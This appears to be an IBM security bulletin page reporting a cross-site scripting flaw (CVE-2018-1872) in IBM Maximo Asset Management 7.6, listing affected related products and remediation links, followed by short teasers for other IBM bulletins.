Medium Severity

IBM Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site scripting (CVE-2018-1872)

Share this post:

IBM Maximo Asset Management is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVE(s): CVE-2018-1872

Affected product(s) and affected version(s):

This vulnerability affects the following versions of the IBM Maximo Asset Management core product, and all other IBM Maximo Industry Solution and IBM Control Desk products, regardless of their own version, if they are currently installed on top of an affected IBM Maximo Asset Management. *

Maximo Asset Management core product affected versions:
Maximo Asset Management 7.6

Industry Solutions products affected if using an affected core version:
Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities

IBM Control Desk products affected if using an affected core version:
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

* To determine the core product version, log in and view System Information. The core product version is the “Tivoli’s process automation engine” version. Please consult the Product Coexistence Matrix for a list of supported product combinations.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10737461
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/151330

More stories

IBM Security Bulletin: The Community Edition of IBM ILOG CPLEX Optimization Studio is affected by a vulnerability in libcurl (CVE-2018-16840)

Nov 21, 2018 8:02 am EST | Medium Severity

The Community Edition of IBM ILOG CPLEX Optimization Studio on Windows platform only has addressed the following vulnerability: libcurl is vulnerable to a denial of service. CVE(s): CVE-2018-16840 Affected product(s) and affected version(s): Affected IBM ILOG CPLEX Optimization Studio Affected Versions IBM ILOG CPLEX Optimization Studio 12.8 Refer to the following reference URLs for remediation ...read more


IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime IBM affect IBM Decision Optimization Center and IBM ILOG ODM Enterprise

Nov 21, 2018 8:02 am EST | Medium Severity

There are multiple vulnerabilities in IBM® SDK Java™ and IBM® Runtime Environment Java™ Versions 6 and 7 used by IBM Decision Optimization Center. These issues were disclosed as part of the IBM Java SDK updates in October 2018 CVE(s): CVE-2018-3180 Affected product(s) and affected version(s): IBM Decision Optimization Center v3.9.0.2 and earlier Refer to the ...read more


IBM Security Bulletin: Vulnerabilities in Python affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2018-1061, CVE-2018-1060)

Nov 21, 2018 8:01 am EST | Medium Severity

Vulnerabilities in Open Source Python affect IBM Tivoli Application Dependency Discovery Manager. CVE(s): CVE-2018-1060, CVE-2018-1061 Affected product(s) and affected version(s): TADDM 7.2.2.0 – 7.2.2.5 TADDM 7.3.0.0 – 7.3.0.5 Refer to the following reference URLs for remediation and additional vulnerability details:Source Bulletin: http://www.ibm.com/support/docview.wss?uid=ibm10738359X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/145116X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/145115 ...read more